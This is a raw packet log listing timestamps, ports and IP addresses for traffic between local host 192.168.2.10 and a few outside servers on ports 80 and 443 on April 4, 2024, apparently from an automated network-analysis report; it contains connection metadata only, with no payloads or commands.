Apr 4, 2024 17:49:07.234889030 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.234904051 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.234910965 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.234945059 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.234954119 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.234982014 CEST	80	49733	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:07.234986067 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.243566990 CEST	443	49735	23.47.27.74	192.168.2.10
Apr 4, 2024 17:49:07.243663073 CEST	49735	443	192.168.2.10	23.47.27.74
Apr 4, 2024 17:49:07.289144993 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.404154062 CEST	49735	443	192.168.2.10	23.47.27.74
Apr 4, 2024 17:49:07.404185057 CEST	443	49735	23.47.27.74	192.168.2.10
Apr 4, 2024 17:49:07.404537916 CEST	443	49735	23.47.27.74	192.168.2.10
Apr 4, 2024 17:49:07.408211946 CEST	49735	443	192.168.2.10	23.47.27.74
Apr 4, 2024 17:49:07.408917904 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:07.409003019 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:07.409018993 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:07.409061909 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:07.409198999 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:07.409281015 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:07.409282923 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:07.409563065 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:07.415883064 CEST	49735	443	192.168.2.10	23.47.27.74
Apr 4, 2024 17:49:07.460231066 CEST	443	49735	23.47.27.74	192.168.2.10
Apr 4, 2024 17:49:07.556148052 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.556164026 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.556190968 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.556216002 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.556227922 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.556257010 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.556266069 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.556289911 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.556319952 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.556325912 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.556344032 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.556359053 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.556374073 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.556404114 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.556406975 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.556444883 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.556457043 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.556461096 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.556485891 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.556505919 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.556505919 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.556515932 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.556519032 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.556566000 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.556580067 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.556586981 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.556592941 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.556615114 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.556646109 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.556648016 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.556659937 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.556679010 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.556694031 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.556716919 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.556740046 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.556752920 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.556756973 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.556813955 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.556826115 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.556839943 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.556853056 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.556873083 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.556899071 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.556911945 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.556934118 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.556936979 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.556957960 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.556962013 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.556976080 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.557008028 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.557024956 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.557090998 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.557135105 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.557147026 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.557149887 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.557168961 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.557194948 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.557214022 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.557224035 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.557228088 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.557241917 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.557249069 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.557265997 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.557277918 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.557310104 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.557336092 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.557344913 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.557362080 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.557368040 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.557378054 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.557408094 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.557424068 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.557437897 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.557449102 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.557460070 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.557482958 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.557508945 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.557523966 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.557557106 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.557557106 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.557571888 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.557590961 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.557595015 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.557607889 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.557607889 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.557626009 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.557632923 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.557651997 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.557656050 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.557676077 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.557692051 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.557719946 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.557734013 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.557765961 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.557769060 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.557787895 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.557806015 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.557805061 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.557846069 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.557878017 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.557893038 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.557904959 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.557925940 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.557952881 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.557955980 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.557970047 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.557982922 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.557993889 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.558006048 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.558008909 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.558021069 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.558046103 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.558073044 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.558100939 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.558113098 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.558125973 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.558151960 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.558165073 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.558171034 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.558201075 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.558212042 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.558243036 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.558247089 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.558271885 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.558279037 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.558285952 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.558300018 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.558309078 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.558326006 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.558352947 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.558360100 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.558398008 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.558419943 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.558438063 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.558456898 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.558473110 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.558485985 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.558507919 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.558509111 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.558528900 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.558552980 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.558588028 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.558626890 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.558628082 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.558651924 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.558670044 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.558682919 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.558692932 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.558712959 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.558739901 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.558753967 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.558773994 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.558793068 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.558816910 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.558821917 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.558860064 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.558860064 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.558875084 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.558897018 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.558912039 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.558937073 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.558952093 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.558964014 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.558974981 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.558978081 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.558999062 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.559016943 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.559026957 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.559048891 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.559060097 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.559076071 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.559091091 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.559107065 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.559113979 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.559134960 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.559169054 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.559181929 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.559192896 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.559212923 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.559232950 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.559236050 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.559261084 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.559277058 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.559290886 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.559313059 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.559324026 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.559351921 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.559355021 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.559392929 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.559392929 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.559408903 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.559423923 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.559451103 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.559457064 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.559469938 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.559482098 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.559503078 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.559519053 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.559528112 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.559535027 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.559551001 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.559566021 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.559592962 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.559606075 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.559628963 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.559640884 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.559643984 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.559665918 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.559681892 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.559691906 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.559716940 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.559719086 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.559730053 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.559747934 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.559761047 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.559812069 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.559825897 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.559838057 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.559851885 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.559876919 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.559880972 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.559895039 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.559907913 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.559915066 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.559930086 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.559943914 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.559959888 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.559972048 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.559983015 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.559992075 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.560019016 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.560023069 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.560053110 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.560082912 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.560106039 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.560143948 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.560157061 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.560170889 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.560194016 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.560200930 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.560225010 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.560240030 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.560244083 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.560277939 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.560312033 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.560312986 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.560326099 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.560357094 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.560395002 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.560436010 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.560472012 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.560509920 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.560549021 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.560564995 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.560580969 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.560611963 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.560683012 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.560729027 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.560745955 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.560770988 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.560776949 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.560792923 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.560815096 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.560832024 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.560832024 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.560890913 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.560904980 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.560911894 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.560939074 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.560956955 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.560971022 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.560983896 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.560986996 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.561007977 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.561013937 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.561037064 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.561042070 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.561057091 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.561080933 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.561096907 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.561109066 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.561122894 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.561141968 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.561158895 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.561170101 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.561197996 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.561212063 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.561225891 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.561258078 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.561286926 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.561300039 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.561323881 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.561331034 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.561338902 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.561352968 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.561378002 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.561393023 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.561407089 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.561419010 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.561439037 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.561449051 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.561461926 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.561461926 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.561486006 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.561486006 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.561501980 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.561523914 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.561531067 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.561547995 CEST	80	49730	103.23.232.80	192.168.2.10
